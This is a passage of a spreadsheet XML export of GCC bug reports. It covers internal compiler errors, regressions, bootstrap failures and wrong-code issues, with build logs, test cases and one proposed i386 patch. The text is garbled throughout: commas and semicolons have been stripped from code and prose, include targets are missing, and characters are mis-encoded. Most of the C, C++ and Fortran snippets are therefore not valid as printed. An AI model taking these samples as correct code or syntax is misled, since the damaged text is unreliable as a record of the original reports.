$GCC_SRC_DIR/configure --prefix=$PREFIX \
    --with-sysroot=$SYSROOT --with-build-sysroot=$SYSROOT \
    --target=$TARGET --host=$HOST --build=$BUILD \
    --enable-languages=cc++java \
    --with-gnu-as --with-gnu-ld \
    --disable-nls --disable-debug --disable-shared --disable-checking \
    --enable-threads=win32 --disable-win32-registry --enable-sjlj-exceptions \
    --enable-libgcj
I will attach the part of the build log that shows this error.</t>
  </si>
  <si>
    <t>GCC-23825</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] Extra C++ failures</t>
  </si>
  <si>
    <t>Starting from
http://gcc.gnu.org/ml/gcc-testresults/2005-09/msg00497.html
there are extra C++ failures:
FAIL: g++.dg/other/error8.C  (test for errors line 8)
FAIL: g++.dg/other/error8.C  (test for errors line 9)
FAIL: g++.dg/other/error8.C duplicate error messages (test for bogus messages
line 8)
FAIL: g++.dg/other/error8.C duplicate error messages (test for bogus messages
line 9)
FAIL: g++.dg/template/union1.C (test for excess errors)
WARNING: g++.dg/template/union1.C compilation failed to produce executable
They aren't fixed as in
http://gcc.gnu.org/ml/gcc-testresults/2005-09/msg00544.html</t>
  </si>
  <si>
    <t>GCC-7537</t>
  </si>
  <si>
    <t>GCC 3.1.1 ICE on GNU libiconv 1.8</t>
  </si>
  <si>
    <t>GNU's libiconv gives an ICE. Only workaround for me is to compile it with -g and no other compiler flags.
following: stderr output of make:
libtool: install: warning: remember to run `libtool --finish /usr/local/lib'
iconv.c: In function `cp932ext_mbtowc':
iconv.c:434: unrecognizable insn:
(insn 238 236 240 (set (reg:QI 90)
        (const_int 128 [0x80])) -1 (nil)
    (nil))
iconv.c:434: Internal compiler error in extract_insn at recog.c:2148
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[1]: *** [libiconv_plug_linux.so] Error 1
make: *** [all] Error 2
Release:
gcc 3.1.1
Environment:
lfs machine using glibc 2.2.5 (with patches from
http://www.zipworld.com.au/~gschafer/lfs-tweaks.html )
see www.linuxfromscratch.org for more information
How-To-Repeat:
CFLAGS=-O (in the included case I've set them to -O3 -march=i686 -mcpu=i686 -mmmx -msse  but I've had the same prolem when compiling with -O or any other flag with the exception of -g. (very strange)
./configure &amp;&amp; make</t>
  </si>
  <si>
    <t>plukje</t>
  </si>
  <si>
    <t>GCC-6015</t>
  </si>
  <si>
    <t>3.1 pre libstdc++ number formatting is not mt-safe.</t>
  </si>
  <si>
    <t>libstdc++ was changed 2002-01-22 to use __convert_from_v to format numbers and __convert_from_v basically does 
setlocale C sprintf setlocale back
Unfortunately this is completely not thread safe since all the other threads will change locales too thus giving completely unpredictable results.
Release:
3.1 20020320 (prerelease)
Environment:
all</t>
  </si>
  <si>
    <t>tot</t>
  </si>
  <si>
    <t>GCC-36832</t>
  </si>
  <si>
    <t>[4.3 / 4.4 Regression] error compiling with crope</t>
  </si>
  <si>
    <t>regarding rope class taken from libstdc++43-devel-4.3.1_20080507-6.1 from suse 11.0 distribution:
compiling the following program result in an error:
#include 
int main()
{
 __gnu_cxx::crope myRope
 myRope = 1234567890
 char buffer[100]
 myRope.copy(11buffer)
 return 0
}
the error:
/usr/include/c++/4.3/bits/stl_construct.h: In function void std::_Destroy(_ForwardIterator _ForwardIterator _Allocator&amp;) [with _ForwardIterator = char* _Allocator = const std::allocator]:
/usr/include/c++/4.3/ext/rope:1963:   instantiated from size_t __gnu_cxx::rope::copy(size_t size_t _CharT*) const [with _CharT = char _Alloc = std::allocator]
rope.cpp:9:   instantiated from here
/usr/include/c++/4.3/bits/stl_construct.h:120: error: passing const std::allocator as this argument of void __gnu_cxx::new_allocator::destroy(_Tp*) [with _Tp = char] discards qualifiers</t>
  </si>
  <si>
    <t>paolo.carlini</t>
  </si>
  <si>
    <t>george.gugulea</t>
  </si>
  <si>
    <t>GCC-38383</t>
  </si>
  <si>
    <t>fails to build cross gcc for target hppa64-hp-hpux11.00</t>
  </si>
  <si>
    <t>fails to build because of a wrong LINK_GCC_C_SEQUENCE_SPEC definition in 
gcc/config/pa/pa64-hpux.h
The required library milli.a is hardcoded as /usr/lib/pa20_64/milli.a.
That doesn't work in the cross compiler case becasue it has to be searched for in the sysroot.</t>
  </si>
  <si>
    <t>rainer</t>
  </si>
  <si>
    <t>GCC-48164</t>
  </si>
  <si>
    <t>ICE in redirect_jump at jump.c:1443</t>
  </si>
  <si>
    <t>Created attachment 23688
Test case
$ g++ -O2 t.cxx -c
t.cxx: In member function â€˜void TDataSetManager::MonitorUsedSpace()â€™:
t.cxx:26:1: internal compiler error: in redirect_jump at jump.c:1443
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ g++ --version
g++ (Ubuntu/Linaro 4.5.2-6ubuntu2) 4.5.2
Copyright (C) 2010 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ uname -a
Linux ubuntu 2.6.38-6-generic #34-Ubuntu SMP Tue Mar 8 14:15:57 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Apologies for the lengthy test case - any further reductions I tried caused the ICE to vanish.
Cheers Axel.</t>
  </si>
  <si>
    <t>gcc</t>
  </si>
  <si>
    <t>GCC-7734</t>
  </si>
  <si>
    <t>ICE in cp_expr_size at cp/cp-lang.c:130</t>
  </si>
  <si>
    <t>ICE in cp_expr_size at cp/cp-lang.c:130
Release:
gcc 3.2 20020826
Environment:
Linux Athlon-XP(i686)
gcc configured with follow options:--disable-nls --with-elf --enable-languages=cc++ --with-gnu-ld --with-gnu-as --enable-threads
binutils (2.13.90 20020826)
How-To-Repeat:
g++ -c kkeyserver.cpp</t>
  </si>
  <si>
    <t>spigel</t>
  </si>
  <si>
    <t>GCC-31559</t>
  </si>
  <si>
    <t>[4.1 only] Assigning to an EXTERNAL leads to ICE</t>
  </si>
  <si>
    <t>subroutine a(fun) 
  implicit none
  integer intent(in) :: fun
  real external   :: funget
  real v
  v = funget(fun) 
  funget = -99.9
end subroutine a
laptop:kargl[221] gfc4x -c -O g.f90
g.f90: In function 'a':
g.f90:6: internal compiler error: in gfc_conv_variable at fortran/trans-expr.c:444
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Clearly the assignment to funget is not legal.</t>
  </si>
  <si>
    <t>GCC-29422</t>
  </si>
  <si>
    <t>ICE with allocatable</t>
  </si>
  <si>
    <t>The following code (derived from allocatable_1.f90)
Type drv
 Integer::i
 Integerallocatable::arr(:)
End type drv
  print * fun1()
contains
  Function fun1 ()
    Type(drv)::fun1
    Fun1%i=10
  end function fun1
end
gives
allocatable_1_db.f90: In function â€˜MAIN__â€™:
allocatable_1_db.f90:12: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Cheers
Dominique</t>
  </si>
  <si>
    <t>GCC-59395</t>
  </si>
  <si>
    <t>[4.8 Regression] double free with procedure pointer component</t>
  </si>
  <si>
    <t>I receive an ICE when compiling this source code with 4.8.1 and 4.8.2:
module mymod
  implicit none
  integer parameter :: k = selected_real_kind(11) ! no bug with k = 4
  type t
   integer                       :: m   ! can't swap this line with next one
   procedure(f) pointer nopass :: ab ! have to be at least two of them
  end type
  interface
    integer function f(n)
      integer :: n
    end function
  end interface
end module mymod
program test
  use mymod
end program test
*****
Output from gfortran source.f90 -save-temps -v
1 gfortran 4.8.1 on OpenBSD/macppc
Driving: egfortran source.f90 -save-temps -v -l gfortran -l m
Using built-in specs.
COLLECT_GCC=egfortran
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/powerpc-unknown-openbsd5.4/4.8.1/lto-wrapper
Target: powerpc-unknown-openbsd5.4
Configured with: /usr/obj/ports/gcc-4.8.1/gcc-4.8.1/configure --enable-libgcj --without-jar --verbose --program-transform-name='s^e' --disable-nls --disable-checking --with-system-zlib --disable-libmudflap --disable-libgomp --disable-tls --with-as=/usr/bin/as --with-ld=/usr/bin/ld --with-gnu-ld --with-gnu-as --enable-threads=posix --enable-wchar_t --with-gmp=/usr/local --enable-languages=cc++fortranobjcjava --disable-libstdcxx-pch --enable-cpp --enable-shared --prefix=/usr/local --sysconfdir=/etc --mandir=/usr/local/man --infodir=/usr/local/info --localstatedir=/var --disable-silent-rules
Thread model: posix
gcc version 4.8.1 (GCC) 
COLLECT_GCC_OPTIONS='-save-temps' '-v'
 /usr/local/libexec/gcc/powerpc-unknown-openbsd5.4/4.8.1/f951 source.f90 -quiet -dumpbase source.f90 -auxbase source -version -fintrinsic-modules-path /usr/local/lib/gcc/powerpc-unknown-openbsd5.4/4.8.1/finclude -o source.s
GNU Fortran (GCC) version 4.8.1 (powerpc-unknown-openbsd5.4)
        compiled by GNU C version 4.8.1 GMP version 5.0.2 MPFR version 3.1.0-p3 MPC version 0.9
GGC heuristics: --param ggc-min-expand=65 --param ggc-min-heapsize=131072
GNU Fortran (GCC) version 4.8.1 (powerpc-unknown-openbsd5.4)
        compiled by GNU C version 4.8.1 GMP version 5.0.2 MPFR version 3.1.0-p3 MPC version 0.9
GGC heuristics: --param ggc-min-expand=65 --param ggc-min-heapsize=131072
f951 in free(): error: chunk is already free 0x86f96060
f951 in malloc(): error: recursive call
egfortran: internal compiler error: Abort trap (program f951)
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
2 gfortran 4.8.2-1 from fink on macppc OS 10.4
Angesteuert: /sw/bin/gfortran -mmacosx-version-min=10.4 source.f90 -save-temps -v -l gfortran -shared-libgcc
Es werden eingebaute Spezifikationen verwendet.
COLLECT_GCC=/sw/bin/gfortran
COLLECT_LTO_WRAPPER=/sw/lib/gcc4.8/libexec/gcc/powerpc-apple-darwin8.11.0/4.8.2/lto-wrapper
Ziel: powerpc-apple-darwin8.11.0
Konfiguriert mit: ../gcc-4.8.2/configure --prefix=/sw AS=odas AS_FOR_TARGET=odas NM_FOR_TARGET=odnm LD_FOR_TARGET=odld AR_FOR_TARGET=odar LIPO_FOR_TARGET=odlipo OBJDUMP_FOR_TARGET=odobjdump RANLIB_FOR_TARGET=odranlib STRIP_FOR_TARGET=odstrip --prefix=/sw/lib/gcc4.8 --mandir=/sw/share/man --infodir=/sw/lib/gcc4.8/info --enable-languages=cc++fortranltoobjcobj-c++java --with-gmp=/sw --with-libiconv-prefix=/sw --with-isl=/sw --with-cloog=/sw --with-mpc=/sw --with-system-zlib --enable-checking=release --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --program-suffix=-fsf-4.8 --with-dwarf2 --disable-libjava-multilib --disable-libquadmath
Thread-Modell: posix
gcc-Version 4.8.2 (GCC) 
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.4' '-save-temps' '-v' '-shared-libgcc'
 /sw/lib/gcc4.8/libexec/gcc/powerpc-apple-darwin8.11.0/4.8.2/f951 source.f90 -fPIC -quiet -dumpbase source.f90 -mmacosx-version-min=10.4 -auxbase source -version -fintrinsic-modules-path /sw/lib/gcc4.8/lib/gcc/powerpc-apple-darwin8.11.0/4.8.2/finclude -o source.s
GNU Fortran (GCC) Version 4.8.2 (powerpc-apple-darwin8.11.0)
        kompiliert von GNU-C-Version 4.8.2 GMP-Version 5.1.3 MPFR-Version 3.1.2 MPC-Version 1.0.1.
GGC-Heuristik: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU Fortran (GCC) Version 4.8.2 (powerpc-apple-darwin8.11.0)
        kompiliert von GNU-C-Version 4.8.2 GMP-Version 5.1.3 MPFR-Version 3.1.2 MPC-Version 1.0.1.
GGC-Heuristik: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
[address=61707265 pc=00826c94]
source.f90: In Funktion Â»mainÂ«:
source.f90:20:0: interner Compiler-Fehler: Speicherzugriffsverletzung [*]
   use mymod
 ^
libbacktrace could not find executable to open
Bitte senden Sie einen vollstÃ¤ndigen Fehlerbericht auf Englisch ein
bearbeiten Sie die Quellen zunÃ¤chst mit einem PrÃ¤prozessor wenn es
dienlich ist.
Siehe  fÃ¼r nÃ¤here Anweisungen.
[*] memory access violation</t>
  </si>
  <si>
    <t>janus</t>
  </si>
  <si>
    <t>demarchie</t>
  </si>
  <si>
    <t>GCC-19964</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 regression] ICE on invalid member declaration</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE since gcc 3.4.0:
==================
struct A
{
    A : A
}
==================
bug.cc:3: error: expected primary-expression before '' token
bug.cc:3: error: name 'A' has incomplete type
bug.cc:2: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
With the similar code snippet
==================
struct A
{
    A : B
}
==================
I get an ICE since at least gcc 2.95.3.
bug.cc:3: error: 'B' was not declared in this scope
bug.cc:3: error: name 'A' has incomplete type
bug.cc:2: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-68618</t>
  </si>
  <si>
    <t>interrupt fails on ICE in some call cases with miamcu with -O2/3</t>
  </si>
  <si>
    <t>Reproduce:
bash-4.2$ cat ../i2.c
struct interrupt_frame
void (*foo1[1])(int a int b)
void foo2(int c)
{
        foo1[c](12)
}
static __attribute__((interrupt)) void my_isr(struct interrupt_frame *frame)
{
        int c
        foo2(c)
}
int main()
{
}
bash-4.2$ ./../gcc_trunk_64bit_old_interrupt/install/bin/gcc -m32 -miamcu -O3 -DU ../i2.c
../i2.c: In function â€˜foo2â€™:
../i2.c:8:1: error: unable to find a register to spill
 }
 ^
../i2.c:8:1: error: this is the insn:
(call_insn/j 10 19 11 2 (call (mem:QI (reg/f:SI 91 [90]) [0 *_3 S1 A8])
        (const_int 0 [0])) ../i2.c:7 662 {*sibcall}
     (expr_list:REG_DEAD (reg/f:SI 91 [90])
        (expr_list:REG_DEAD (reg:SI 1 dx)
            (expr_list:REG_DEAD (reg:SI 0 ax)
                (expr_list:REG_CALL_DECL (nil)
                    (nil)))))
    (expr_list:SI (use (reg:SI 0 ax))
        (expr_list:SI (use (reg:SI 1 dx))
            (nil))))
../i2.c:8:1: internal compiler error: in assign_by_spills at lra-assigns.c:1431
0xa6f4a8 _fatal_insn(char const* rtx_def const* char const* int char const*)
        .././../TRUNK/gcc6/gcc/rtl-error.c:109
0x970019 assign_by_spills
        .././../TRUNK/gcc6/gcc/lra-assigns.c:1431
0x970a53 lra_assign()
        .././../TRUNK/gcc6/gcc/lra-assigns.c:1606
0x96c459 lra(_IO_FILE*)
        .././../TRUNK/gcc6/gcc/lra.c:2344
0x922919 do_reload
        .././../TRUNK/gcc6/gcc/ira.c:5392
0x922919 execute
        .././../TRUNK/gcc6/gcc/ira.c:5563
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
This bug can be fixed with:
diff --git a/gcc/config/i386/i386.c b/gcc/config/i386/i386.c
index cb6f8f4..b1523e0 100644
--- a/gcc/config/i386/i386.c
+++ b/gcc/config/i386/i386.c
@@ -53398 +53398 @@ ix86_set_current_function (tree fndecl)
     reinit_regs ()
   /* AX register is only preserved if there are no caller-saved
      registers.  */
-  else if (cfun-&gt;machine-&gt;no_caller_saved_registers
-          == call_used_regs[AX_REG])
+  else if ((cfun-&gt;machine-&gt;no_caller_saved_registers
+          == call_used_regs[AX_REG]) || TARGET_IAMCU)
     reinit_regs ()
 }
However unconditional calling of reinit_regs is bad.</t>
  </si>
  <si>
    <t>julia.koval</t>
  </si>
  <si>
    <t>GCC-249</t>
  </si>
  <si>
    <t>Internal compiler error on nested template class declaration</t>
  </si>
  <si>
    <t>The appended code causes an internal compiler error.  I can
recreate the problem with 2.95.2 and with the development
sources of May 26 2000.
Release:
2.95.2 and development sources of May 26 2000
Environment:
i686-pc-linux-gnu (Red Hat 6.1)
How-To-Repeat:
gcc -c foo.ii
Also happens with -O and -O2.</t>
  </si>
  <si>
    <t>GCC-38903</t>
  </si>
  <si>
    <t>Bootstrap failure on Cygwin vs. libiberty.</t>
  </si>
  <si>
    <t>[refs: http://gcc.gnu.org/ml/gcc/2009-01/threads.html#00060
       http://gcc.gnu.org/ml/gcc/2009-01/threads.html#00216 ]
Bootstrap on cygwin is currently failing during stage 3 with:
	  /home/andy/live-gcc/my_gcc/./gcc/xgcc
-B/home/andy/live-gcc/my_gcc/./gcc/ -B/usr/local/i686-pc-cygwin/bin/
-B/usr/local/i686-pc-cygwin/lib/ -isystem
/usr/local/i686-pc-cygwin/include -isystem
/usr/local/i686-pc-cygwin/sys-include -c -DHAVE_CONFIG_H -g -O2    -I.
-I../../../gcc/libiberty/../include  -W -Wall -Wwrite-strings
-Wc++-compat -Wstrict-prototypes -pedantic
../../../gcc/libiberty/strsignal.c -o pic/strsignal.o \
	else true fi
/home/andy/live-gcc/my_gcc/./gcc/xgcc
-B/home/andy/live-gcc/my_gcc/./gcc/ -B/usr/local/i686-pc-cygwin/bin/
-B/usr/local/i686-pc-cygwin/lib/ -isystem
/usr/local/i686-pc-cygwin/include -isystem
/usr/local/i686-pc-cygwin/sys-include -c -DHAVE_CONFIG_H -g -O2    -I.
-I../../../gcc/libiberty/../include  -W -Wall -Wwrite-strings
-Wc++-compat -Wstrict-prototypes -pedantic
../../../gcc/libiberty/strsignal.c -o strsignal.o
../../../gcc/libiberty/strsignal.c:408: error: conflicting types for 'strsignal'
/usr/include/string.h:78: note: previous declaration of 'strsignal' was here
make[2]: *** [strsignal.o] Error 1
make[2]: Leaving directory `/home/andy/live-gcc/my_gcc/i686-pc-cygwin/libiberty'
make[1]: *** [all-target-libiberty] Error 2
make[1]: Leaving directory `/home/andy/live-gcc/my_gcc'
make: *** [all] Error 2
This happens because libiberty configure has a hard-coded hack that kicks in when building libiberty as a target library which causes strsignal (and a couple of others) to be removed from the list of functions for configure to check against the system libraries causing the libiberty versions to be built when they aren't needed.  (They used to be required formerly Cygwin pulled in the object files from libiberty when linking the DLL but this was fixed some time ago and the hack has been obsolete since then).  I am testing a patch to remove the hack.</t>
  </si>
  <si>
    <t>davek</t>
  </si>
  <si>
    <t>dave.korn.cygwin</t>
  </si>
  <si>
    <t>GCC-49094</t>
  </si>
  <si>
    <t>ARM aligned(1) attribute is sometimes dropped</t>
  </si>
  <si>
    <t>Created attachment 24313
simple test case to demonstrate problem
GCC 4.6.0 sometimes produces unaligned accesses for structures with __attribute__((aligned(1)packed)).  GCC 4.4.1 seems fine.
See the attached tst.c file.  GCC 4.6.0 will access an unaligned ip-&gt;ip_dst with ldr instead of several ldrb instructions.
The file can be compiled and examined with:
  arm-none-eabi-gcc -c  -g -Os tst.c
  arm-none-eabi-objdump -S tst.o
*********
GCC 4.6.0 produces:
Disassembly of section .text:
00000000 :
{
  struct ip *ip = (struct ip *)m
  struct in_addr pkt_dst
  pkt_dst = ip-&gt;ip_dst 
  if( pkt_dst.s_addr == 0 )
    return 1
   0:   e5900007        ldr     r0 [r0 #7]
  else
    return 0
}
   4:   e2700001        rsbs    r0 r0 #1
   8:   33a00000        movcc   r0 #0
   c:   e12fff1e        bx      lr
*********
GCC 4.4.1 produces:
Disassembly of section .text:
00000000 :
} __attribute__ ((aligned(1) packed))
struct ip *ip_fw_fwd_addr
int test_alignment( char *m )
{
   0:   e5d02008        ldrb    r2 [r0 #8]
   4:   e5d03007        ldrb    r3 [r0 #7]
   8:   e5d01009        ldrb    r1 [r0 #9]
   c:   e1833402        orr     r3 r3 r2 lsl #8
  10:   e5d0200a        ldrb    r2 [r0 #10]
  14:   e1833801        orr     r3 r3 r1 lsl #16
  18:   e1932c02        orrs    r2 r3 r2 lsl #24
  pkt_dst = ip-&gt;ip_dst 
  if( pkt_dst.s_addr == 0 )
    return 1
  else
    return 0
}
  1c:   13a00000        movne   r0 #0   0x0
  20:   03a00001        moveq   r0 #1   0x1
  24:   e12fff1e        bx      lr</t>
  </si>
  <si>
    <t>will_lentz</t>
  </si>
  <si>
    <t>GCC-83456</t>
  </si>
  <si>
    <t>-Wrestrict false positive on a non-overlapping memcpy in an inline function</t>
  </si>
  <si>
    <t>As reported in bug 78918 comment #7 the enhanced -Wrestrict warning issues a false positive on the following code.  The false positive is caused by issuing the warning during folding after bar() has been inlined but before the call to memcpy has been eliminated.  The reason for issuing the warning in this case (i.e. equal operands) is to help detect bugs in code built without optimization when an unguarded overlapping call to the library function would be made but it may not be worth the bug reports for the safe cases like this one.
$ cat z.c &amp;&amp; gcc -O2 -S -Wall z.c
extern void* memcpy (void* const void* __SIZE_TYPE__)
inline void bar (void *d void *s unsigned N)
{
  if (s != d)
    memcpy (d s N)
}
void foo (void* src)
{
  bar (src src 1)
}
z.c: In function â€˜fooâ€™:
z.c:6:5: warning: â€˜memcpyâ€™ source argument is the same as destination [-Wrestrict]
     memcpy (d s N)
     ^~~~~~~~~~~~~~~~</t>
  </si>
  <si>
    <t>msebor</t>
  </si>
  <si>
    <t>GCC-43161</t>
  </si>
  <si>
    <t>Wrong debug info in guality/vla-1.c (f2)</t>
  </si>
  <si>
    <t>Tracking http://gcc.gnu.org/bugzilla/show_bug.cgi?id=43150#c2 issue 2) here:
In f2 with -O2 -g -m64 we have
in *.ce3 (which looks correct):
(insn 2 53 3 2 vla-1.c:22 (set (reg/v:SI 41 r12 [orig:61 i ] [61])
        (reg:SI 5 di [ i ])) 47 {*movsi_1} (expr_list:REG_DEAD (reg:SI 5 di [ i
])
        (nil)))
(note 3 2 6 2 NOTE_INSN_FUNCTION_BEG)
(debug_insn 6 3 7 2 vla-1.c:23 (var_location:SI D.4294967290 (plus:SI (mult:SI
(reg/v:SI 41 r12 [orig:61 i ] [61])
            (const_int 2 [0x2]))
        (const_int 7 [0x7]))) -1 (nil))
(debug_insn 7 6 8 2 vla-1.c:23 (var_location:DI D.4294967292 (sign_extend:DI
(debug_expr:SI D#6))) -1 (nil))
(debug_insn 8 7 9 2 vla-1.c:23 (var_location:DI D.4294967293 (plus:DI
(debug_expr:DI D#4)
        (const_int -1 [0xffffffffffffffff]))) -1 (nil))   
(debug_insn 9 8 10 2 vla-1.c:23 (var_location:DI D.1619 (debug_expr:DI D#3)) -1
(nil))
(note 10 9 46 2 NOTE_INSN_DELETED)
(insn 46 10 12 2 vla-1.c:23 (set (reg:SI 0 ax [63])
        (subreg:SI (plus:DI (mult:DI (reg:DI 41 r12 [orig:61 i ] [61])
                    (const_int 2 [0x2]))
                (const_int 7 [0x7])) 0)) 271 {*lea_1_rex64} (nil))
but then *.cprop_hardreg breaks it up:
(insn 2 53 3 2 vla-1.c:22 (set (reg/v:SI 41 r12 [orig:61 i ] [61])
        (reg:SI 5 di [ i ])) 47 {*movsi_1} (expr_list:REG_DEAD (reg:SI 5 di [ i
])
        (nil)))
(note 3 2 6 2 NOTE_INSN_FUNCTION_BEG)
(debug_insn 6 3 7 2 vla-1.c:23 (var_location:SI D.4294967290 (plus:SI (mult:SI
(reg:SI 5 di [orig:61 i ] [61])
            (const_int 2 [0x2]))
        (const_int 7 [0x7]))) -1 (nil))
(debug_insn 7 6 8 2 vla-1.c:23 (var_location:DI D.4294967292 (sign_extend:DI
(debug_expr:SI D#6))) -1 (nil))
(debug_insn 8 7 9 2 vla-1.c:23 (var_location:DI D.4294967293 (plus:DI
(debug_expr:DI D#4)
        (const_int -1 [0xffffffffffffffff]))) -1 (nil))
(debug_insn 9 8 10 2 vla-1.c:23 (var_location:DI D.1619 (debug_expr:DI D#3)) -1
(nil))
(note 10 9 46 2 NOTE_INSN_DELETED)
(insn 46 10 12 2 vla-1.c:23 (set (reg:SI 0 ax [63])
        (subreg:SI (plus:DI (mult:DI (reg:DI 41 r12 [orig:61 i ] [61])
                    (const_int 2 [0x2]))
                (const_int 7 [0x7])) 0)) 271 {*lea_1_rex64} (nil))
(while %rdi is equal to %r12 at that point %rdi is REG_DEAD in an earlier
insn so extending lifetime of that into a DEBUG_INSN after it leads to a
resetting of debug_insn 6 during sched2.  I believe we need to make sure we
don't extend lifetime of hard regs in debug insns during cprop_hardreg.</t>
  </si>
  <si>
    <t>GCC-78506</t>
  </si>
  <si>
    <t>[c++1z] wrong value category for class decomposition</t>
  </si>
  <si>
    <t>The spec and intent looks straightforward to me i should be an lvalue.
//----------
struct one {
    int i
}
int main()
{
    auto
    // error: taking address of xvalue (rvalue reference)
}</t>
  </si>
  <si>
    <t>lucdanton</t>
  </si>
  <si>
    <t>GCC-46622</t>
  </si>
  <si>
    <t>ARM --target-help headings not translated</t>
  </si>
  <si>
    <t>arm.c:arm_target_help prints lists of -march and -mcpu values for --target-help.  The headings of these lists should be translated but are passed straight to printf without translation.
  printf (  Known ARM CPUs (for use with the -mcpu= and -mtune= options):\n)
  printf (\n\n  Known ARM architectures (for use with the -march= option):\n)</t>
  </si>
  <si>
    <t>GCC-79660</t>
  </si>
  <si>
    <t>[7 regression] Arm register allocation failure with thumb1 building libgcc</t>
  </si>
  <si>
    <t>Created attachment 40799
testcase
New failure in register allocation.
Compiler configured for arm-none-eabi (default CPU = arm7tdmi).
/work/rearnsha/scratch/gnu/gcc/arm/trunk/./gcc/cc1  -quiet -mthumb   -g -O2   -fbuilding-libgcc -fno-stack-protector -fno-inline ice.i -mcpu=arm7tdmi
ice.i:31:1: error: unable to find a register to spill
 }
 ^
ice.i:31:1: error: this is the insn:
(insn 136 145 137 2 (set (reg:SI 159)
        (neg:SI (ltu:SI (subreg:SI (reg:DI 163 [orig:111 _2 ] [111]) 4)
                (subreg:SI (reg/v:DI 124 [ temp1 ]) 4)))) ice.i:21 849 {cstoresi_nltu_thumb1}
     (expr_list:REG_DEAD (reg:DI 163 [orig:111 _2 ] [111])
        (nil)))
ice.i:31: confused by earlier errors bailing out</t>
  </si>
  <si>
    <t>mpf</t>
  </si>
  <si>
    <t>rearnsha</t>
  </si>
  <si>
    <t>GCC-48256</t>
  </si>
  <si>
    <t>gcc4.4.5 internal compiler error: in change_address_1 at emit-rtl.c:1954</t>
  </si>
  <si>
    <t>Created attachment 23759
FFTW generated source file which fails in compilation
I get an internal compiler error when attempting to compile FFTW code for ARM NEON.  Details described below.
HW/SW setup
-----------
BeagleBoard xM (native compilation using gcc under ubuntu)
Ubuntu 10.10
GNU make 3.8.1
gcc (Ubuntu/Linaro 4.4.1-14ubuntu5) 4.4.5
FFTW codebase and setup
-----------------------
git clone git://gitorious.org/gsoc2010-fftw-neon gsoc2010-fftw-neon
cd gsoc2010-fftw-neon
make clean
sh bootstrap.sh 
CFLAGS=-O3 -pipe -mcpu=cortex-a8 -mfpu=neon -mfloat-abi=softfp ./configure --prefix=/usr --enable-single --enable-shared --with-pic --host=arm-none-linux-gnueabi --enable-armv7-cycle-counter --enable-neon 
make
cd kernel
cp cpy1d.c __cpy1d.c
cp cpy1d-neon.c cpy1d.c
cd ..
make
snippet from failing make (offending file attached)
---------------------------------------------------
/bin/bash ../../../libtool --tag=CC --mode=compile gcc -std=gnu99 -DHAVE_CONFIG_H -I. -I../../..  -I../../../kernel -I../../../dft -I../../../dft/simd -I../../../simd  -mfpu=neon -O3 -pipe -mcpu=cortex-a8 -mfpu=neon -mfloat-abi=softfp  -MT n1fv_128.lo -MD -MP -MF .deps/n1fv_128.Tpo -c -o n1fv_128.lo n1fv_128.c
libtool: compile:  gcc -std=gnu99 -DHAVE_CONFIG_H -I. -I../../.. -I../../../kernel -I../../../dft -I../../../dft/simd -I../../../simd -mfpu=neon -O3 -pipe -mcpu=cortex-a8 -mfpu=neon -mfloat-abi=softfp -MT n1fv_128.lo -MD -MP -MF .deps/n1fv_128.Tpo -c n1fv_128.c  -fPIC -DPIC -o .libs/n1fv_128.o
n1fv_128.c: In function 'n1fv_128':
n1fv_128.c:3513: internal compiler error: in change_address_1 at emit-rtl.c:1954
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[5]: *** [n1fv_128.lo] Error 1</t>
  </si>
  <si>
    <t>moloned</t>
  </si>
  <si>
    <t>GCC-82442</t>
  </si>
  <si>
    <t>vect/pr31699.c fails on arm</t>
  </si>
  <si>
    <t>Since r253403 the gcc.dg/vect/pr31699.c is now enabled on arm*hf targets thanks to vect_float effective target. It used to be unsupported with vect_double.
Now that it is enabled it fails on such targets:
FAIL:    gcc.dg/vect/pr31699.c -flto -ffat-lto-objects  scan-tree-dump-times vect vectorized 1 loops 2
FAIL:    gcc.dg/vect/pr31699.c scan-tree-dump-times vect vectorized 1 loops 2
for instance
--target arm-none-linux-gnueabihf
--with-mode arm
--with-cpu cortex-a9
--with-fpu neon-fp16</t>
  </si>
  <si>
    <t>clyon</t>
  </si>
  <si>
    <t>GCC-9842</t>
  </si>
  <si>
    <t>Compile error when accessing a bitfield base class member</t>
  </si>
  <si>
    <t>Using the attached code gcc returns the following error:
hg@linux:~&gt; gcc -o bf.exe bf.cpp
bf.cpp: In member function `void B::f()':
bf.cpp:11: illegal pointer to bit-field `A::ib'
It should be possible to access a base class member even if it's a bitfield.
The file bf.cpp contains the following code:
class A
{
public:
    unsigned int ib:1
}
class B : public A
{
public:
    unsigned int ib
    void f(){ A::ib=1}
}
int main()
{
    B b
    b.f()
    return (0)
}
Release:
gcc version 3.2
Environment:
SuSe Linux 8.1 (with gcc 3.2) or W2k with mingw-gcc 3.2.2
How-To-Repeat:
Just copy the code given above to bf.cpp and run
gcc -o bf.exe bf.cpp</t>
  </si>
  <si>
    <t>hg</t>
  </si>
  <si>
    <t>GCC-35465</t>
  </si>
  <si>
    <t>[4.4 Regression] Bootstrap failure at rev. 132875</t>
  </si>
  <si>
    <t>Bootstrap fails at rev. 132875 with:
